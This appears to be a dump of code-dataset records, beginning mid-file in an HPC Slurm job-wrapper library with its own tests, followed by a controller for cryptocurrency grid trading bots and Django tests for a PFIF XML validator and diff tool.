Following check functions return in the form of\n # return a flag, error message, error code , 
new value to assign in case of warnings\n # They are wrapped as callable objects and stored in a list of rules\n\n # Takes in a partition and checks if it is in the list of allowed partitions\n # If not, return VALUE_ERROR to raise an ERROR and stop code exec\n def check_partitions(self, p):\n if p not in swc.SWS_CONF['ALLOWED_PARTITIONS']:\n return False, \"{} Partition {} does not exist. {}\".format(FAIL, p, ENDC), swc.SWS_CONF['VALUE_ERROR'], \"\"\n if \"cpu\" in p:\n return False, \"Note: {} CPU partition used. Ignoring all user-specified node config {}\".format(BADWARNING, ENDC), swc.SWS_CONF['WARNING'], p\n return True, \"\" , 0, \"\"\n\n def check_node_type(self, p):\n if p not in swc.SWS_CONF['ALLOWED_NODE_TYPE']:\n return False, \"{} Node Type {} does not exist. {}\".format(FAIL, p, ENDC), swc.SWS_CONF['VALUE_ERROR'], \"\"\n return True, \"\" , 0, \"\"\n\n # Takes in a time as hours and checks it against a range\n # If not, cuts it off at limit and raises a WARNING\n def check_time(self, t):\n tret = swc.SWS_CONF['HOURS_DEFAULT']\n flag = True\n err_msg = \"\"\n err_code = 0\n\n if t < 1:\n tret = swc.SWS_CONF['HOURS_DEFAULT']\n flag = False\n err_msg = \"Warning: {} Time below 1 hour, using default of {} hours.{}\".format(BADWARNING, swc.SWS_CONF['HOURS_DEFAULT'], ENDC)\n err_code = swc.SWS_CONF['WARNING']\n elif t > swc.SWS_CONF['HOURS_UL']:\n tret = swc.SWS_CONF['HOURS_UL']\n flag = False\n err_msg = \"Warning: {} Time above {} hours, capping at {}. {}\".format(BADWARNING, swc.SWS_CONF['HOURS_UL'], swc.SWS_CONF['HOURS_UL'], ENDC)\n err_code = swc.SWS_CONF['WARNING']\n else:\n tret = t\n\n return flag, err_msg, err_code, tret\n\n # Takes in a cpu_per_gpu and checks it against a range\n # If not, RAISES an ERROR by return error code to parameter check\n def check_cpu_per_gpu(self, cpg):\n cpgret = swc.SWS_CONF['CPU_PER_GPU_DEFAULT']\n flag = True\n err_msg = \"\"\n err_code = 0\n\n if cpg < swc.SWS_CONF['CPU_PER_GPU_LL'] or cpg > swc.SWS_CONF['CPU_PER_GPU_UL']:\n flag = False\n err_msg = \"{}Invalid value of {} CPU per GPU, please input an integer in the range between {} and {}.{}\".format(FAIL, cpg, swc.SWS_CONF['CPU_PER_GPU_LL'], swc.SWS_CONF['CPU_PER_GPU_UL'], ENDC)\n err_code = swc.SWS_CONF['VALUE_ERROR']\n\n return flag, err_msg, err_code, 0\n\n # search for container image\n def check_container(self, container_noext):\n toret = \"\"\n flag = True\n err_msg = \"\"\n err_code = 0\n\n ftree = {}\n depth = 0\n for dirpath, dirnames, filenames, dirfd in os.fwalk(swc.SWS_CONF['HAL_CONTAINER_REGISTRY']):\n ftree[depth] = {'directory':dirpath, 'files':filenames}\n depth += 1\n\n final_img = \"\"\n found = False\n for k, v in ftree.items():\n if k <= swc.SWS_CONF['CONTAINER_SEARCH_DEPTH_LIMIT']:\n for ext in swc.SWS_CONF['ALLOWED_CONTAINER_IMAGE_EXTENSIONS']:\n container = container_noext + ext\n if container in v['files']:\n final_img = \"{}/{}\".format(v['directory'], container)\n found = True\n if found == True:\n break\n if found == True:\n break\n\n if final_img == \"\":\n flag = False\n err_msg = \"{}Container image not found!{}\\n{} Started topdown search of depth {} from {} for {} {}\".format(FAIL, ENDC, \" \"*len(\"ValueError:\"), swc.SWS_CONF['CONTAINER_SEARCH_DEPTH_LIMIT'], swc.SWS_CONF['HAL_CONTAINER_REGISTRY'], container_noext, swc.SWS_CONF['ALLOWED_CONTAINER_IMAGE_EXTENSIONS'])\n err_code = swc.SWS_CONF['VALUE_ERROR']\n else:\n flag = False\n err_msg = \"{}Container image found!{} Using {}\".format(OKGREEN + BLACK_TEXT , ENDC, final_img)\n err_code = 
swc.SWS_CONF['WARNING']\n toret = final_img\n\n return flag, err_msg, err_code, toret\n\n # Checks User Parameters in terms of limits\n # Based on flag return from rules, it checks error code\n # Based on error code it outputs an error message which it ALSO got from rules\n def parameter_checks(self, dict_params, params_to_clean):\n for p in params_to_clean:\n # first check is parameter to clean is actually present\n if p in dict_params:\n x = dict_params[p]\n if x == \"\" or x == None:\n continue\n else:\n # then try to find the related function to check the value\n if p in self._rules:\n flag, err_msg, err_code, corrected_value = self._rules[p](x)\n if flag == False:\n if err_code == swc.SWS_CONF['VALUE_ERROR']:\n raise ValueError(err_msg)\n elif err_code == swc.SWS_CONF['TYPE_ERROR']:\n raise TypeError(err_msg)\n elif err_code == swc.SWS_CONF['WARNING']:\n print(err_msg)\n dict_params[p] = corrected_value\n\n return\n\n\n ###################################### Creations Fns ###########################################\n\n # creates a job parameters dictionary from uparams i.e user parameters dictionary\n def job_parameters_init(self, uparams, mode):\n job_parameters = {}\n # User supplied k=key, v=value\n for k,v in uparams.items():\n job_parameters[k] = v\n # Generated\n job_parameters[\"nodes\"] = 1\n job_parameters[\"ntasks-per-node\"] = swc.SWS_CONF['NTASKS_PER_NODE']\n job_parameters[\"sockets-per-node\"] = swc.SWS_CONF['SOCKETS_PER_NODE']\n job_parameters[\"cores-per-socket\"] = swc.SWS_CONF['CORES_PER_SOCKET']\n job_parameters[\"threads-per-core\"] = swc.SWS_CONF['THREADS_PER_CORE']\n job_parameters[\"gpus\"] = swc.SWS_CONF['GPUS']\n if uparams[\"node_type\"] == \"ppc64le\":\n job_parameters[\"mem-per-cpu\"] = swc.SWS_CONF['NODE_DEFINE'][0]['mem_cpu']\n if uparams[\"node_type\"] == \"arm\":\n job_parameters[\"mem-per-cpu\"] = swc.SWS_CONF['NODE_DEFINE'][1]['mem_cpu']\n if uparams[\"node_type\"] == \"x86\":\n job_parameters[\"mem-per-cpu\"] = swc.SWS_CONF['NODE_DEFINE'][2]['mem_cpu']\n\n if mode == swc.SWS_CONF['INTERACTIVE_MODE']:\n job_parameters[\"wait\"] = 0\n\n if mode in [swc.SWS_CONF['INTERACTIVE_MODE'], swc.SWS_CONF['SCRIPT_MODE']]:\n job_parameters[\"export\"] = \"ALL\"\n\n return job_parameters\n\n # takes a dictionary and creates the srun command and infers layout of job\n def build_command_internal(self, params):\n job_parameters = params.copy()\n to_del = []\n for k,v in job_parameters.items():\n if v == \"\" or v == None:\n to_del.append(k)\n for item in to_del:\n del job_parameters[item]\n\n cpu_flag = 1\n multiplier = swc.SWS_CONF['MULTIPLIER']\n\n partition = job_parameters[\"partition\"]\n q_num = int(partition.split('x')[1]) if \"gpu\" in partition else 0\n\n if q_num >= 1 and q_num<=4:\n multiplier = q_num\n if job_parameters[\"node_type\"] == \"ppc64le\":\n job_parameters[\"partition\"] = \"gpu\"\n if job_parameters[\"node_type\"] == \"arm\":\n job_parameters[\"partition\"] = \"arm\"\n if job_parameters[\"node_type\"] == \"x86\":\n job_parameters[\"partition\"] = \"x86\" \n elif q_num >=8 and q_num <= 16:\n multiplier = 4\n job_parameters[\"nodes\"] = q_num // 4\n if job_parameters[\"node_type\"] == \"ppc64le\":\n job_parameters[\"partition\"] = \"gpu\"\n if job_parameters[\"node_type\"] == \"arm\":\n job_parameters[\"partition\"] = \"arm\"\n if job_parameters[\"node_type\"] == \"x86\":\n job_parameters[\"partition\"] = \"x86\" \n else:\n # cpu job\n cpu_flag = 0\n multiplier = 4\n c_num = int(partition.split('n')[1]) if \"cpun\" in partition else 0\n if c_num 
> 0:\n job_parameters[\"partition\"] = \"cpu\"\n job_parameters[\"nodes\"] = c_num\n if job_parameters[\"node_type\"] == \"arm\":\n c_num = int(partition.split('n')[1]) if \"cpux\" in partition else 0\n job_parameters[\"partition\"] = \"arm\"\n job_parameters[\"nodes\"] = 1\n if job_parameters[\"node_type\"] == \"x86\":\n c_num = int(partition.split('n')[1]) if \"cpux\" in partition else 0\n job_parameters[\"partition\"] = \"x86\"\n job_parameters[\"nodes\"] = 1\n\n if job_parameters[\"node_type\"] == \"ppc64le\":\n gpu_type = swc.SWS_CONF['NODE_DEFINE'][0]['gpu_type']\n if job_parameters[\"node_type\"] == \"arm\":\n gpu_type = swc.SWS_CONF['NODE_DEFINE'][1]['gpu_type']\n if job_parameters[\"node_type\"] == \"x86\":\n gpu_type = swc.SWS_CONF['NODE_DEFINE'][2]['gpu_type']\n\n job_parameters[\"gres\"] = \"gpu:{}:{}\".format(gpu_type,job_parameters.pop(\"gpus\")*multiplier*cpu_flag)\n\n job_parameters[\"sockets-per-node\"] = 2 if multiplier > 2 else 1\n\n cpg = job_parameters.pop(\"cpu_per_gpu\")\n\n if cpu_flag == 1:\n job_parameters[\"cores-per-socket\"] = math.ceil(cpg / job_parameters[\"threads-per-core\"] * multiplier / job_parameters[\"sockets-per-node\"])\n job_parameters[\"ntasks-per-node\"] = job_parameters[\"cores-per-socket\"]*job_parameters[\"sockets-per-node\"]*job_parameters[\"threads-per-core\"]\n elif cpu_flag == 0:\n job_parameters[\"cores-per-socket\"] = 1\n job_parameters[\"ntasks-per-node\"] = 1\n\n hrs = job_parameters[\"time\"]\n\n # disabled for no debug queue\n # if hrs <= swc.SWS_CONF['HOURS_DEBUG'] and q_num>=1 and q_num<=4:\n # job_parameters[\"partition\"] = swc.SWS_CONF['DEBUG_PARTITION']\n job_parameters[\"time\"] = \"{}:00:00\".format(hrs)\n\n job_parameters.pop(\"node_type\")\n\n return job_parameters\n\n # takes a command dicitonary and makes it into an executable command\n def command_dict_to_command(self, command_dict, mode):\n if mode == swc.SWS_CONF['INTERACTIVE_MODE']:\n command = swc.SWS_CONF['SLURM_RUN']\n elif mode == swc.SWS_CONF['ALLOCATION_MODE']:\n command = swc.SWS_CONF['SLURM_ALLOC']\n else:\n # logic in build command makes sure you never come here\n # but if you do change it, let default be\n command = swc.SWS_CONF['SLURM_RUN']\n\n for k,v in command_dict.items():\n command += \" --{}={}\".format(k,v)\n\n # Add a shell to for interactive session\n if mode == swc.SWS_CONF['INTERACTIVE_MODE']:\n command += \" {} {}\".format(\"--pty\", swc.SWS_CONF['SHELL'])\n\n return command\n\n # takes a command dicitonary and makes it into a runnable script\n # from misc it takes any non scheduler commands and comments and adds them to the script buffer\n def command_dict_to_script(self, command_dict, misc):\n script_buffer = \"\"\n\n script_buffer = swc.SWS_CONF['SHEBANG'] + \"\\n\"\n for k,v in command_dict.items():\n t = k\n if t == \"job_name\":\n t = \"job-name\"\n script_buffer += \"{} --{}={}\\n\".format(swc.SWS_CONF['SLURM_BATCH'], t, v)\n\n script_buffer += \"\\n\"\n for (idx, comm) in misc:\n if idx == swc.SWS_CONF['NON_BATCH_COMMAND'] or idx == swc.SWS_CONF['COMMENT']:\n script_buffer += \"{}\\n\".format(comm)\n\n return script_buffer\n\n # create the exec command for the container\n def get_container_exec_command(self, command_dict, mode):\n command = \"\"\n img = \"\"\n gpu_flag = \"\"\n\n if \"singularity\" in command_dict:\n img = command_dict.pop(\"singularity\")\n if command_dict['nodes'] == 1:\n gpu_flag = \" --nv\" if 'gpu' in command_dict['partition'] else \"\"\n else:\n raise TypeError(\"{}Running a container interactively only works on one 
node now!{}\".format(FAIL, ENDC))\n command = \"\\nmodule load singularity\"\n command += \"\\n{} {}{} {}\".format(\"singularity\", mode, gpu_flag, img)\n\n return command\n\n # Takes a dictionary and resolves certain values if they are environment variables\n def resolve_env_vars(self, conf):\n for k, v in conf.items():\n if type(v) == str:\n if v[0] == \"$\":\n conf[k] = os.environ[v[1:]]\n\n return\n\n def __init__(self):\n self._job_parameters = {}\n self._rules = {\"partition\": partial(self.check_partitions),\n \"time\": partial(self.check_time),\n \"node_type\": partial(self.check_node_type),\n \"cpu_per_gpu\": partial(self.check_cpu_per_gpu),\n \"singularity\": partial(self.check_container)}\n self._conf = swc.SWS_CONF\n\n self.resolve_env_vars(self._conf)\n globals().update(self._conf)\n\n return\n\n ################################# Some Build Fn Wrappers #######################################\n\n # to build srun command\n def build_command(self, args, u_args, mode):\n cur_mode = swc.SWS_CONF['INTERACTIVE_MODE']\n if mode == 'interactive':\n cur_mode = swc.SWS_CONF['INTERACTIVE_MODE']\n elif mode == 'allocation':\n cur_mode = swc.SWS_CONF['ALLOCATION_MODE']\n else:\n raise ValueError(\"Invalid mode specified for building command!\")\n\n uparams = {}\n uparams[\"partition\"] = args.partition[0]\n uparams[\"cpu_per_gpu\"] = swc.SWS_CONF['CPU_PER_GPU_DEFAULT'] if type(args.cpu_per_gpu) == int else args.cpu_per_gpu[0]\n\n uparams[\"node_type\"] = swc.SWS_CONF['NODE_TYPE_DEFAULT']\n # print(swc.SWS_CONF['NODE_DEFINE'][0]['gpu_type'])\n\n wtf = args.time[0]\n try:\n hh, mm, ss = wtf.split(':')\n hrs = int(hh)\n if int(mm) > 0:\n hrs = hrs + 1\n except ValueError:\n hrs = int(wtf)\n uparams[\"time\"] = int(hrs) \n\n if \"node_type\" in args:\n uparams[\"node_type\"] = args.node_type[0]\n\n if \"singularity\" in args:\n if args.singularity == \"84r\":\n uparams[\"singularity\"] = \"\"\n else:\n uparams[\"singularity\"] = args.singularity[0]\n\n if \"reservation\" in args:\n if args.reservation == \"84r\":\n uparams[\"reservation\"] = \"\"\n else:\n uparams[\"reservation\"] = args.reservation[0]\n\n self._job_parameters = self.job_parameters_init(uparams, mode=cur_mode)\n self.parameter_checks(self._job_parameters, u_args)\n command_dict = self.build_command_internal(self._job_parameters)\n \n # Inserts a singularity exec command after the srun command above\n singularity_command = self.get_container_exec_command(command_dict, \"shell\")\n command_buffer = self.command_dict_to_command(command_dict, mode=cur_mode)\n command_buffer += \"{}\".format(singularity_command)\n\n return command_buffer\n\n # to build sbatch script\n def build_run_script(self, run_script, u_args):\n print(\".........Run Script received {}.........\\n\".format(run_script))\n read_data = None\n with open(run_script) as f:\n read_data = f.read()\n print(read_data)\n script_data = read_data.split(\"\\n\")\n\n script_data = [x.strip() for x in script_data if x != \"\"]\n\n # following takes the lines of the script and tags them with an integer for identification\n scommands = []\n for x in script_data:\n if x[:len(swc.SWS_CONF['SLURM_BATCH'])] == swc.SWS_CONF['SLURM_BATCH']:\n scommands.append((swc.SWS_CONF['BATCH_COMMAND'],x))\n elif (x[0] == \"#\" and x[1:1+len(swc.SWS_CONF['SHELL'])] == swc.SWS_CONF['SHELL']) or (x[0:2] == \"#!\" and x[2:2+len(swc.SWS_CONF['SHELL'])] == swc.SWS_CONF['SHELL']):\n scommands.append((3,x))\n elif x[0] == '#':\n scommands.append((swc.SWS_CONF['COMMENT'],x))\n else:\n 
scommands.append((swc.SWS_CONF['NON_BATCH_COMMAND'],x))\n\n        uparams = {}\n        for sc in scommands:\n            # if it is a BATCH command\n            if sc[0] == swc.SWS_CONF['BATCH_COMMAND']:\n                p = sc[1].split(\" \")[1].split(\"=\")\n                key = p[0].split(\"--\")[1]\n                if key == \"time\":\n                    try:\n                        hh, mm, ss = p[1].split(':')\n                        hrs = int(hh)\n                        if int(mm) > 0:\n                            hrs = hrs + 1\n                    except ValueError:\n                        hrs = int(p[1])\n                    uparams[key] = int(hrs)\n                else:\n                    # only non-time keys take the raw value; time was already normalized to whole hours above\n                    uparams[key] = int(p[1]) if p[1].isdigit() else p[1]\n\n        if \"partition\" not in uparams:\n            raise ValueError(\"Need Partition!\")\n        if \"cpu_per_gpu\" not in uparams:\n            uparams[\"cpu_per_gpu\"] = swc.SWS_CONF['CPU_PER_GPU_DEFAULT']\n        if \"time\" not in uparams:\n            uparams[\"time\"] = swc.SWS_CONF['HOURS_DEFAULT']\n\n        # params created\n        self._job_parameters = self.job_parameters_init(uparams, mode=swc.SWS_CONF['SCRIPT_MODE'])\n        self.parameter_checks(self._job_parameters, u_args)\n        command_dict = self.build_command_internal(self._job_parameters)\n\n        # Inserting container execution command at the start of script, after SBATCH commands\n        singularity_command = self.get_container_exec_command(command_dict, \"exec\")\n        if len(singularity_command) > 0:\n            sing_exec_command = singularity_command.split(\"\\n\")[2]\n            singularity_command = singularity_command.split(\"\\n\")[1]\n            for i in range(len(scommands)):\n                if scommands[i][0] == swc.SWS_CONF['NON_BATCH_COMMAND']:\n                    scommands[i] = (scommands[i][0], sing_exec_command + \" \" + scommands[i][1])\n\n            scommands.insert(0, (swc.SWS_CONF['NON_BATCH_COMMAND'], singularity_command))\n\n        script_buffer = self.command_dict_to_script(command_dict, scommands)\n\n        return script_buffer\n\n    ############################## Some Read-Accessible Variables ##################################\n    @property\n    def job_parameters(self):\n        return self._job_parameters\n\n\n########################################## Testing fns #############################################\n\ndef check_command(command, list_of_checks):\n    for item in list_of_checks:\n        if item not in command:\n            print(\"Can't find {} in {}\".format(item, command))\n            return 0\n    return 1\n\n\ndef run_command_tests():\n    num_tests = 0\n    num_tests_passed = 0\n    logs = \"Command Tests\\n\"\n\n    argStruct = namedtuple(\"argStruct\", \"partition cpu_per_gpu time singularity\")\n    user_arguments = [\"partition\", \"cpu_per_gpu\", \"time\", \"singularity\"]\n    bldr = Builder()\n\n    #################################### Partition Tests ###########################################\n    print(\"Running Partition Tests...\")\n    logs += \"\\nRunning Partition Tests...\\n\"\n\n    for p in swc.SWS_CONF['ALLOWED_PARTITIONS']:\n        args = argStruct(partition=[p], cpu_per_gpu=[16], time=['4'], singularity=[\"\"])\n        command = bldr.build_command(args, user_arguments, 'interactive')\n\n        num_tests += 1\n        temp = check_command(command, [\" --partition={}\".format(p)])\n        num_tests_passed += temp\n        passfail_msg = TEST_PASSED if temp == 1 else TEST_FAILED\n        logs += \"\\nTest num:{}\\n{}\\n{}\\n{}\\n\".format(num_tests, args, command, passfail_msg)\n\n\n    ####################################### Time Tests #############################################\n    print(\"Running Time Tests...\")\n    logs += \"\\n\\nRunning Time Tests...\\n\"\n\n    test_time = 1\n    args = argStruct(partition=[\"gpux1\"], cpu_per_gpu=[16], time=[test_time], singularity=[\"\"])\n    command = bldr.build_command(args, user_arguments, 'interactive')\n\n    num_tests += 1\n    temp = check_command(command, [\" --time={}:00:00\".format(test_time),\n                                   \" 
--partition={}\".format(swc.SWS_CONF['DEBUG_PARTITION'])])\n    num_tests_passed += temp\n    passfail_msg = TEST_PASSED if temp == 1 else TEST_FAILED\n    logs += \"\\nTest num:{}\\n{}\\n{}\\n{}\\n\".format(num_tests, args, command, passfail_msg)\n\n    args = argStruct(partition=[\"gpux16\"], cpu_per_gpu=[16], time=[test_time], singularity=[\"\"])\n    command = bldr.build_command(args, user_arguments, 'interactive')\n\n    num_tests += 1\n    temp = check_command(command, [\" --time={}:00:00\".format(test_time),\n                                   \" --partition={}\".format(\"gpux16\")])\n    num_tests_passed += temp\n    passfail_msg = TEST_PASSED if temp == 1 else TEST_FAILED\n    logs += \"\\nTest num:{}\\n{}\\n{}\\n{}\\n\".format(num_tests, args, command, passfail_msg)\n\n    ####################################### Cpu Tests ############################################\n    print(\"Running Other Tests...\")\n    logs += \"\\n\\nRunning Other Tests...\\n\"\n\n    # args = argStruct(partition=[\"cpu\"], cpu_per_gpu=[16], time=[1], singularity=[\"\"])\n    # command = bldr.build_command(args, user_arguments, 'interactive')\n    # NOTE: with the cpu case above disabled, the check below reuses the command from the previous test\n\n    num_tests += 1\n    temp = check_command(command, [\" --ntasks-per-node={}\".format(swc.SWS_CONF['NTASKS_PER_NODE_CPU']),\n                                   \" --cores-per-socket={}\".format(swc.SWS_CONF['CORES_PER_SOCKET_CPU']),\n                                   \" --gres=gpu:v100:{}\".format(0)])\n    num_tests_passed += temp\n    passfail_msg = TEST_PASSED if temp == 1 else TEST_FAILED\n    logs += \"\\nTest num:{}\\n{}\\n{}\\n{}\\n\".format(num_tests, args, command, passfail_msg)\n\n    return num_tests, num_tests_passed, logs\n\ndef run_script_tests():\n    num_tests = 0\n    num_tests_passed = 0\n    logs = \"Script Tests\\n\"\n\n    # user_arguments = [\"partition\", \"cpu_per_gpu\", \"time\", \"job_name\", \"output\", \"error\", \"singularity\"]\n    # bldr = Builder()\n    # final_run_script_buffer = bldr.build_run_script(args.run_script[0], user_arguments)\n    return num_tests, num_tests_passed, logs\n\ndef run_e2e_tests(log_flag):\n    test_fns = {\"Command\": partial(run_command_tests),\n                \"Script\": partial(run_script_tests)}\n    num_tests = len(test_fns)\n    total_logs = \"\"\n\n    total_nt = 0\n    total_ntp = 0\n    test_num = 1\n    for test_name, cur_test in test_fns.items():\n        str1 = \"Part {}/{}: Running {} Tests...\".format(test_num, num_tests, test_name)\n        print(str1)\n\n        nt, ntp, logs = cur_test()\n        total_nt += nt\n        total_ntp += ntp\n\n        str2 = \"Part {}/{} passed {} out of {} tests!\\n\".format(test_num, num_tests, ntp, nt)\n        print(str2)\n\n        total_logs += \"Part {}/{} {}\\n{}\\n{}\\n\\n\".format(test_num, num_tests, logs, str2, TEST_DIVIDER)\n        test_num += 1\n\n\n    finalstr = \"\\nTesting overview: {} out of {} tests passed\".format(total_ntp, total_nt)\n    print(finalstr)\n    total_logs += finalstr\n\n    if log_flag == True:\n        with open(\"swtools_logs.txt\", 'w') as f:\n            f.write(total_logs)\n\n\n# Testing is ignored if this python script is imported elsewhere\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(\n        description=\"HAL Slurm Wrapper Suite v1.1 Tools Library\",\n        usage=\"python3 swtools.py [-h] [-l]\")\n\n    parser.add_argument(\"-l\", \"--log\",\n                        help=\"Create a local text file to log all the tests\",\n                        action='store_true')\n\n    args = parser.parse_args()\n\n    print(\"Running End-to-End Tests...\\n\")\n    run_e2e_tests(args.log)\n    print(\"Run Complete!\")\n    if args.log == True:\n        print(\"Check local logs for more info.\")\n\n# end of 
script\n","repo_name":"ncsa/swsuite","sub_path":"src/swtools.py","file_name":"swtools.py","file_ext":"py","file_size_in_byte":24926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20240496941","text":"import os\nfrom AI_System import ai\nfrom order_middleware import *\nimport ccxt.async_support as ccxt\nimport configparser\nimport time\n\nclass AiController:\n \n activeMiddleware = {}\n\n def __init__(self):\n return\n\n def grid_amount(self):\n return self.GRID_AMOUNT\n\n def search_Active_By_ID(self, id):\n return self.activeMiddleware[id] != None \n\n\n def makeAIInstance(self, dummy, key, secret, coin):\n \n #TODO Pass a variable for each of the values defined.\n\n lower_percentage = 0.0005\n profit_percentage = 0.001\n\n EXCHANGE = ccxt.ftx({\"verbose\": False, \"enableRateLimit\": True, \"apiKey\": key, \"secret\": secret})\n AI = ai.AIGridBot(EXCHANGE, dummy, coin, lower_percentage, profit_percentage) # Dummy True = Fake, False = Real\n return AI\n\n def makeAIInstance(self, dummy, key, secret):\n\n cwd = os.getcwd()\n filename = cwd + \"\\config.ini\"\n\n if not os.path.exists(filename):\n filename = cwd + \"/config.ini\" # Try using / instead of \\\n\n if not os.path.exists(filename):\n print(\"File not found: \", filename)\n quit()\n \n\n config = configparser.ConfigParser()\n config.read(filename)\n\n public_key = key\n private_key = secret\n\n EXCHANGE = ccxt.ftx({\"verbose\": False, \"enableRateLimit\": True, \"apiKey\": public_key, \"secret\": private_key})\n\n coin_pair = config['instance_info']['coin_pair']\n buy_grid_percentage = float(config['instance_info']['buy_grid_percentage'])\n sell_grid_percentage = float(config['instance_info']['sell_grid_percentage'])\n\n AI = ai.AIGridBot(EXCHANGE, dummy, coin_pair, buy_grid_percentage, sell_grid_percentage)\n return AI\n \n \n def add_Pair(self, id, dummy, key, secret, coin):\n \n self.activeMiddleware[id] = AIPairs(id, self.makeAIInstance(dummy, key, secret, coin)) \n print(\"Current number of Instances: \", len(self.activeMiddleware))\n self.activeMiddleware[id].start()\n print(\"Started AI\")\n return\n\n def add_Pair_Read(self, id, dummy, key, secret):\n \n self.activeMiddleware[id] = AIPairs(id, self.makeAIInstance(dummy, key, secret)) \n print(\"Current number of Instances: \", len(self.activeMiddleware))\n self.activeMiddleware[id].start()\n print(\"Started AI\")\n return\n\n def remove_Pair(self, id):\n if id in self.activeMiddleware: \n self.activeMiddleware[id].stop()\n print(\"Stopping AI\")\n del self.activeMiddleware[id] \n print(\"Removed pair with ID:\", id)\n print(\"Current number of Instances: \", len(self.activeMiddleware))\n \n return\n \n\n def status(self, id):\n \n if id in self.activeMiddleware: \n\n ai = self.activeMiddleware[id]\n dummy = ai.get_type()\n if (dummy):\n return 'Dummy'\n else:\n return 'Live'\n else:\n return 'Idle'\n\n def info(self, id):\n\n if id in self.activeMiddleware:\n return self.activeMiddleware[id].get_information()\n\n return \"No Data Retrieved\"\n\nclass AIPairs:\n\n def __init__(self, id, ai):\n self.id = id\n self.ai = ai\n print(\"Created new pair with ID: \", id)\n\n def get_type(self): \n dummy = self.ai.get_information()[\"Dummy\"]\n return dummy\n\n def get_information(self): \n return self.ai.get_information()\n\n def start(self):\n self.ai.start()\n\n def stop(self):\n 
self.ai.stop()","repo_name":"Dankyi/ccast","sub_path":"CCAST_AI_Backend/AIController.py","file_name":"AIController.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36360720060","text":"import copy\nimport os\nfrom StringIO import StringIO\nimport unittest\nimport utils\n\nimport django\nfrom django.test import Client\nfrom django.test.utils import setup_test_environment, teardown_test_environment\n\nimport controller\nimport settings\nimport tests.pfif_xml as PfifXml\n\nclass ControllerTests(unittest.TestCase):\n \"\"\"Tests for the controller.\"\"\"\n\n def setUp(self):\n # TODO(nworden): see if there's a way to avoid this. You'd think\n # settings.BASE_DIR would be useful here but I can't figure out how to make\n # it work for prod, local servers, and tests without overriding the value in\n # tests.\n # The Django test client doesn't actually run a whole server, which is\n # really nice because it's much faster, but it does seem to mess with the\n # template loader, I guess because it's not running from where it normally\n # would (in the app directory).\n settings.TEMPLATES[0]['DIRS'] = ['app/resources']\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')\n django.setup()\n setup_test_environment()\n self.client = Client()\n\n def tearDown(self):\n teardown_test_environment()\n\n def make_request(\n self, post_data, path='/validate/results'):\n \"\"\"Makes a request for the validator with content as the HTTP POST content.\n Returns the response.\"\"\"\n return self.client.post(path, copy.deepcopy(post_data))\n\n # file tests\n\n def test_no_xml_fails_gracefully(self):\n \"\"\"If the user tries to validate with no input, there should not be an\n exception.\"\"\"\n for path in ['/validate/results', '/diff/results']:\n response = self.make_request({}, path=path)\n self.assertTrue(\"html\" in response.content)\n\n def test_pasting_xml(self):\n \"\"\"The page should have the correct number of errors in the header when\n using the pfif_xml_1 POST variable to send PFIF XML.\"\"\"\n response = self.make_request(\n {'pfif_xml_1' : PfifXml.XML_TWO_DUPLICATE_NO_CHILD})\n self.assertTrue(\"3 Messages\" in response.content)\n\n def test_file_upload(self):\n \"\"\"The page should have the correct number of errors in the header when\n using the pfif_xml_file_1 POST variable to send PFIF XML.\"\"\"\n xml_file = StringIO(PfifXml.XML_TWO_DUPLICATE_NO_CHILD)\n xml_file.name = 'two_duplicate_no_child.xml'\n response = self.make_request({'pfif_xml_file_1': xml_file})\n self.assertTrue(\"3 Messages\" in response.content)\n\n def test_url_upload(self):\n \"\"\"The page should have the correct number of errors in the header when\n using the pfif_xml_url_1 POST variable to send PFIF XML.\"\"\"\n utils.set_file_for_test(StringIO(PfifXml.XML_TWO_DUPLICATE_NO_CHILD))\n response = self.make_request({'pfif_xml_url_1' : 'dummy_url'})\n self.assertTrue(\"3 Messages\" in response.content)\n\n # validator\n\n def test_validator_options(self):\n \"\"\"The validator results page should have a span or div for each print\n option.\"\"\"\n xml_file = StringIO(PfifXml.XML_EXPIRE_99_EMPTY_DATA)\n xml_file.name = 'xml_expire_99_empty_data.xml'\n post_dict = {'pfif_xml_file_1' : xml_file,\n 'print_options': ['show_errors']}\n response = self.make_request(post_dict)\n self.assertTrue('ERROR' in response.content)\n self.assertTrue('message_type' in response.content)\n self.assertTrue('message_category' in 
response.content)\n\n post_dict['print_options'].append('show_warnings')\n response = self.make_request(post_dict)\n self.assertTrue('WARNING' in response.content)\n\n post_dict['print_options'].append('show_line_numbers')\n response = self.make_request(post_dict)\n self.assertTrue('message_line_number' in response.content)\n\n post_dict['print_options'].append('show_record_ids')\n response = self.make_request(post_dict)\n self.assertTrue('record_id' in response.content)\n\n post_dict['print_options'].append('show_full_line')\n response = self.make_request(post_dict)\n self.assertTrue('message_xml_full_line' in response.content)\n\n # EXPIRE_99 doesn't have any errors with xml element text or tag, so we use\n # a different XML file\n xml_file = StringIO(PfifXml.XML_INCORRECT_FORMAT_11)\n xml_file.name = 'xml_incorrect_format_11.xml'\n post_dict['pfif_xml_file_1'] = xml_file\n post_dict['print_options'].append('show_xml_tag')\n response = self.make_request(post_dict)\n self.assertTrue('message_xml_tag' in response.content)\n\n post_dict['print_options'].append('show_xml_text')\n response = self.make_request(post_dict)\n self.assertTrue('message_xml_text' in response.content)\n\n # diff\n\n def test_diff(self):\n \"\"\"The diff results page should have a header and a div for each message.\"\"\"\n xml_file = StringIO(PfifXml.XML_ADDED_DELETED_CHANGED_1)\n xml_file.name = 'added_deleted_changed_1.xml'\n utils.set_file_for_test(StringIO(PfifXml.XML_ADDED_DELETED_CHANGED_2))\n post_dict = {\n 'pfif_xml_file_1' : xml_file, 'pfif_xml_url_2' : 'fake_url',\n 'options' : ['text_is_case_sensitive']}\n response = self.make_request(post_dict, path='/diff/results')\n response_str = response.content\n\n # set the test file again because the first one will be at the end, and the\n # xml parser doesn't have to seek(0) on it.\n utils.set_file_for_test(StringIO(PfifXml.XML_ADDED_DELETED_CHANGED_2))\n post_dict['options'].append('group_messages_by_record')\n grouped_response = self.make_request(post_dict, path='/diff/results')\n grouped_response_str = grouped_response.content\n\n # The header should have 'Diff' and 'Messages' in it along with the filename\n # or url.\n # The body should have each of five message types from pfif_object_diff\n for message in ['Diff', 'Messages', 'added_deleted_changed_1.xml',\n 'fake_url', 'extra', 'missing', 'field', 'record', 'Value',\n 'changed', 